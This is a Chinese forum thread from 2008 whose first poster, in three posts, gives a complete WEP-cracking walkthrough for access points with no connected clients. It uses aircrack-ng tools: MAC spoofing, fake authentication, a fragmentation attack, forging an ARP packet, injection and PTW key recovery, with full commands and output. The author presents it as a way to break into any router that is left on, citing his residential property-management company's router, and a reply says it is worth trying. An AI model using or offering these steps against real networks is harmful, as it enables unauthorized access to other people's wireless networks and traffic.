当前时区为 UTC + 8 小时



发表新帖 回复这个主题  [ 4 篇帖子 ] 
作者 内容
1 楼 
 文章标题 : [抄袭]如何破解没有客户端连接的wep密码
帖子发表于 : 2008-10-06 10:58 
头像

注册: 2007-05-06 8:19
帖子: 7433
送出感谢: 0 次
接收感谢: 4
关于破解wep密码的教程已经很多,其工作原理是用aircrack-ng工具包通收集合法客户端上网时产生的大量数据包来进行破解,但是这个破解是建立在目标AP有活动客户端连接的基础上的,如果没有客户端或是客户端没有上网就会无法收集到足够的ivs数据,很多朋友在实验的时候失败的原因就是因为这个。本文旨在讨论破解无客户端连接的wep密码,毕竟现实生活中存在这样的情况的(比如我所在的小区物业管理公司,晚上时经常路由、猫没关,但是没人上网)。从而达到只要对方路由开着,无论有无客户端,客户端有无上网,你都能破解的效果。
一、实验环境
软件:操作系统(OS):wifiway0.8,工具:aircrack-ng(wifiway0.8自带,version:0.91)
硬件:dell640M,无线网卡:intel3945,mac:00:18:de:81:61:95
实验AP:贝尔金7231-4p,mac:00:90:96:00:00:01,工作频道6,essid:MyEHome(请注意大小写),已使用128位WEP加密。
二、实验方案
1、设置无线网卡MAC地址。
2、设置网卡为在指定的ap的工作频道的监控模式。
3、使用aireplay-ng在实验AP上产生虚假认证(fake authentication)。
4、使用fragmentation attack来获得PRGA。
5、使用上一步获得的PRGA用packetforge-ng工具来生成一个arp包。
6、用airodump-ng来收集需要的IVS数据
7、使用第四步得到的arp来注入攻击
8、用aircrack-ng破解
三:详细步骤
一、设置无线网卡mac地址
这一步你也可以省略,因为mac地址比较难记,所以可以用macchanger将网卡的mac设置为一个好记的地址,方便后面使用。打开一个终端窗口输入:wifiway:~#macchanger --mac wifi0 00:11:22:33:44:55(注意wifi0为我电脑无线网卡的接口名,你需要将其换为自己网卡的接口名,请使用iwconfig查看)
二、设置网卡为在指定的ap的工作频道的监控模式。
由于我的ap是工作在频道6上的(可以使用kismet等工具查看),
因此使用以下命令:
airmon-ng start wifi0 6使网卡监听频道6
这样网卡将启动监听模式,系统将反馈(mode monitor enabled)
你可用iwconfig来确认网卡监听模式已启动。
三、使用aireplay-ng来获得PRGA。
这是非常关键的一步。为让AP接受数据包,你必须使网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发送的数据包,并发送回一个未认证消息(DeAuthentication packet),IVS数据将不会产生从而导致无法破解。在终端窗口下输入:
wifiway:~# aireplay-ng -1 0 -e MyEHome -a 00:90:96:00:00:01 -h 00:11:22:33:44:55 wifi0
参数解释:
-1 告诉aireplay使用fake authentication(虚假认证)
-e essid 告诉aireplay目标AP的essid,这里是MyEHome
-a bssid 告诉aireplay目标AP的bssid号,这里是00:90:96:00:00:01。
-h Mac 告诉aireplay我的网卡的mac地址,这里是我在第一步设置的00:11:22:33:44:55
Wifi0为网卡接口名,请注意换成自己的。
该命令如果成功,系统将显示:
20:22:20 Sending Authentication Request(前面的是时间)
20:22:20 Authentication successful
20:22:20 Sending Association Request
20:22:20 Association successful :-)
如果不能成功,系统可能显示:
20:28:02 Sending Authentication Request
20:28:02 Authentication successful
20:28:02 Sending Association Request
20:28:02 Association successful :-)
20:28:02 Got a deauthentication packet!
20:28:05 Sending Authentication Request
20:28:05 Authentication successful
20:28:05 Sending Association Request
20:28:10 Sending Authentication Request
20:28:10 Authentication successful
20:28:10 Sending Association Request
不能成功的原因很多,具体有如下几种:
1、目标AP做了MAC地址过滤
2、你离目标AP物理距离太远
3、对方使用了WPA加密
4、网卡不支持注入
5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道
6、输入的ssid拼写有误,请注意检查
以下为没有成功时系统列出的可能失败原因:
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver hasn't been patched for injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* Injection is not supported AT ALL on HermesI,Centrino, ndiswrapper and a few others chipsets.
* You're too far from the AP. Get closer, or lower
the transmit rate (iwconfig <iface> rate 1M).
你可以根据命令反馈消息来判断原因来尝试解决问题,比如获得一个合法的MAC并伪造MAC、使用-o参数设置发送包的个数、设置网卡到一个较低的rate、到离目标AP更近一点的地方^_^,但是请注意:如果这一步不能成功,下面的步骤请不要再尝试,都是无用功!


页首
 用户资料  
 
2 楼 
 文章标题 : Re: [抄袭]如何破解没有客户端连接的wep密码
帖子发表于 : 2008-10-06 10:59 
头像

注册: 2007-05-06 8:19
帖子: 7433
送出感谢: 0 次
接收感谢: 4
可以使用命令tcpdump来确认网卡是否已经连接到目标AP上
tcpdump -n -e -s0 -vvv -i wifi0
如果没连接成功,AP会反馈网卡告诉其未连接,这意味着AP会忽略所有来自你网卡的注入包,破解不会成功。
成功的话则显示:
tcpdump: WARNING: wifi0: no IPv4 address assigned
tcpdump: listening on wifi0, link-type IEEE802_11 (802.11), capture size 65535 bytes
21:19:26.467114 0us BSSID:00:90:96:00:00:01 DA:ff:ff:ff:ff:ff:ff SA:00:90:96:00:00:01 Beacon (MyEHome) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 6, PRIVACY
……(等一系列包信息)
21:19:27.388775 0us BSSID:00:90:96:00:00:01 DA:ff:ff:ff:ff:ff:ff SA:00:90:96:00:00:01 Beacon (MyEHome) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 6, PRIVACY
21:19:29.129776 0us BSSID:00:90:96:00:00:01 DA:ff:ff:ff:ff:ff:ff SA:00:90:96:00:00:01 Beacon (MyEHome) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 6, PRIVACY

29 packets captured
29 packets received by filter
0 packets dropped by kernel
注意最后三行文字,请按ctrl+c来结束tcpdump进程。
4、使用fragmentation attack来获得PRGA(pseudo random genration algorithm)
这里的PRGA并不是wep key数据,并不能用来解密数据包,而是用它来产生一个新的数据包以便我们在后面的步骤中进行注入。输入命令:wifiway:~# aireplay-ng -5 -b 00:90:96:00:00:01 -h 00:11:22:33:44:55 wifi0
-5 告诉aireplay-ng 使用fragmentation attack模式
-b,-h ,wifi0就不用再解释了吧,呵呵。
系统将显示:
21:20:46 Waiting for a data packet...
Size: 78, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:90:96:00:00:01
Dest. MAC = 01:80:C2:00:00:00
Source MAC = 00:90:96:00:00:01
0x0000: 0842 0000 0180 c200 0000 0090 9600 0001 .B..............
0x0010: 0090 9600 0001 b013 b66d a100 fbd7 4289 .........m....B.
0x0020: d814 0d6c 9570 c61a 0d38 3034 dc48 3e9f ...l.p...804.H>.
0x0030: 273d 2fed c2b7 0991 2557 5c32 aae1 a2fd '=/.....%W\2....
0x0040: 855a 3bbb 5f7f 74ae 1850 2503 bd2f .Z;._.t..P%../
Use this packet ? y(在这里请输入y表示使用这个包)

Saving chosen packet in replay_src-1104-212046.cap(保存了一个cap文件,但并不能用来破解)
21:20:55 Data packet found!
21:20:55 Sending fragmented packet
21:20:55 Got RELAYED packet!!
21:20:55 Thats our ARP packet!
21:20:55 Trying to get 384 bytes of a keystream
21:20:55 Got RELAYED packet!!
21:20:55 Thats our ARP packet!
21:20:55 Trying to get 1500 bytes of a keystream
21:20:55 Got RELAYED packet!!
21:20:55 Thats our ARP packet!
Saving keystream in fragment-1104-212055.xor(生成了一个xor文件)
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
这一步生成的xor文件将被我们用来产生arp数据包,如果你选的包不成功,请多试几次。
5、使用packetforge-ng来产生一个arp包
在第4步中我们得到了PRGA,我们可以利用这个PRGA来产生一个注入包,其工作原理就是使目标AP重新广播包,当AP重广播时,一个新的IVS将产生,我们就是利用这个来破解。现在,我们生成一个注入包。首先输入:wifiway:~# ls(linux下查看当前目录的命令)
Desktop fragment-1104-212055.xor replay_src-1104-212046.cap
可以看见当前有一个fragment-1104-212055.xor(是上一步生成的)
接着输入:
wifiway:~# packetforge-ng -0 -a 00:90:96:00:00:01 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1104-212055.xor -w arp
-0 告诉packetforge-ng来产生一个arp包
-k 是目标IP(绝大部分AP都会对255.255.255.255进行应答)
-l 是源IP(绝大部分AP都会对255.255.255.255进行应答)
-y (filename)是用来读取PRGA的文件
-w (filename)将arp包写入文件,我用的文件名是arp
系统回显:Wrote packet to: arp
这一步我们生成了一个arp包文件,使用ls命令查看:
wifiway:~# ls
Desktop arp fragment-1104-212055.xor replay_src-1104-212046.cap
6:启动airodump-ng
新开一个终端窗口来捕捉ivs,输入命令:
wifiway:~# airodump-ng -c 6 --bssid 00:90:96:00:00:01 -w capture wifi0(参数我就不解释了,相信大家都知道,-w是生成的文件,这里是capture)


页首
 用户资料  
 
3 楼 
 文章标题 : Re: [抄袭]如何破解没有客户端连接的wep密码
帖子发表于 : 2008-10-06 11:00 
头像

注册: 2007-05-06 8:19
帖子: 7433
送出感谢: 0 次
接收感谢: 4
系统回显:
CH 6 ][ Elapsed: 13 s ][ 2007-11-04 21:24

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES

00:90:96:00:00:01 -1 100 157 9 0 6 48 WEP WEP M

BSSID STATION PWR Lost Packets Probes
这里我们可以看到没有工作站,也就是没有客户端连接时airodump会如此显示。
7、注入ARP包
新开一个终端窗口,输入命令:
wifiway:~#aireplay-ng -2 –r arp wifi0
-2 使用交互模式
-r rap从文件中读入arp包
Wifi0是网卡接口
输入后,切换到airodump-ng窗口,我们惊喜的发现,出现工作站窗口了,哈哈,大功告成,只差最后一步了,以下是我的系统回显:
CH 6 ][ Elapsed: 24 s ][ 2007-11-04 21:11

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ES

00:90:96:00:00:01 -1 100 266 5513 279 6 48 WEP WEP M

BSSID STATION PWR Lost Packets Probes

00:90:96:00:00:01 00:11:22:33:44:55 -1 0 5515
注意,可以看到我们的00:11:22:33:44:55已成功连接,有过破解经验的朋友知道出现客户端意味着什么吧^_^
PS:如果BSSID data没有增长,请回到第三步用tcpdump确认网卡是否和AP相关联。
8、使用aircrack-ng来破解
在当前终端窗口中输入wifiway:~#ls
系统显示:
Desktop capture-01.cap fragment-1104-212055.xor replay_src-1104-212321.cap
arp capture-01.txt replay_src-1104-212046.cap
我们就使用这个capture-01.cap来破解(上一步中airodump-ng生成),输入命令:
wifiway:~# aircrack-ng -z -b 00:90:96:00:00:01 capture-01.cap
Opening capture-01.cap
Read 49902 packets.
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 16553 ivs.
Aircrack-ng 0.9.1 r634
[00:01:32] Tested 1117800/1400000 keys (got 47366 IVs)

KB depth byte(vote)
0 0/ 15 A1( 219) C7( 212) 85( 210) 40( 209) 5B( 208) BF( 208)
1 0/ 1 7E( 243) 59( 217) 37( 212) 85( 211) 74( 209) 7E( 207)
2 0/ 1 E2( 262) 38( 209) 6D( 205) F0( 204) 12( 201) EF( 201)
3 0/ 3 50( 230) 44( 211) 4A( 210) 80( 207) DB( 207) 17( 205)
4 0/ 1 12( 264) E7( 214) 33( 211) 4C( 206) 2C( 205) C0( 203)
5 0/ 3 11( 233) CC( 221) 49( 213) 01( 208) 14( 207) 5C( 205)
6 0/ 1 F0( 240) 9C( 215) E5( 212) F9( 208) 22( 207) 67( 206)
7 0/ 1 67( 226) 90( 205) 17( 204) 48( 203) 6F( 203) 71( 200)
8 0/ 1 62( 233) 94( 212) AC( 204) 8C( 202) BE( 202) E2( 202)
9 0/ 5 E6( 226) 3A( 223) 40( 208) EA( 206) 20( 206) 7E( 204)
10 0/ 9 2E( 223) 53( 219) 20( 210) 0E( 206) 9E( 206) D8( 205)
11 18/ 23 6D( 197) 5B( 196) 98( 196) DE( 196) E1( 196) 23( 195)
12 5/ 8 8F( 205) B5( 204) 1E( 204) 77( 202) 76( 200) 7E( 200)

KEY FOUND! [ A1:7E:E2:50:12:11:F0:67:62:E6:2E:A0:8F ]
Decrypted correctly: 100%
Bingo!至此,大功告成!得到key后的事情我不说相信大家也知道怎么用了吧,呵呵。
四、其他需要补充的事项
一、以上所有使用的命令,都可以在linux环境下使用--help命令或是使用man xx命令获得在线帮助,如aireplay-ng –help, man aireplay-ng,阅读该信息能给你极大的帮助,笔者想说的是学习linux将加快你的破解过程,毕竟大部分hacker tools在linux下有更好的支持,本人就是在恶补了一个星期的linux后对破解有了新的认识。
二、使用backtrack livecd也能像以上操作,不过我的IPW3945在BT2下工作不是很正常,所以我是用wifiway来讲解的,你也可以用BT2来进行实验,另外,BT2自带的aircrack-ng好像是0.7版本,请先升级后再使用。
3、本教程不适合破解WPA-PSK加密方式。


页首
 用户资料  
 
4 楼 
 文章标题 : Re: [抄袭]如何破解没有客户端连接的wep密码
帖子发表于 : 2008-10-07 13:55 

注册: 2007-04-26 16:50
帖子: 2
送出感谢: 0 次
接收感谢: 0 次
不错,找机会试试 :em09


页首
 用户资料  
 
显示帖子 :  排序  
发表新帖 回复这个主题  [ 4 篇帖子 ] 

当前时区为 UTC + 8 小时


在线用户

正在浏览此版面的用户:没有注册用户 和 2 位游客


不能 在这个版面发表主题
不能 在这个版面回复主题
不能 在这个版面编辑帖子
不能 在这个版面删除帖子
不能 在这个版面提交附件

前往 :  
本站点为公益性站点,用于推广开源自由软件,由 DiaHosting VPSBudgetVM VPS 提供服务。
我们认为:软件应可免费取得,软件工具在各种语言环境下皆可使用,且不会有任何功能上的差异;
人们应有定制和修改软件的自由,且方式不受限制,只要他们自认为合适。

Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
简体中文语系由 王笑宇 翻译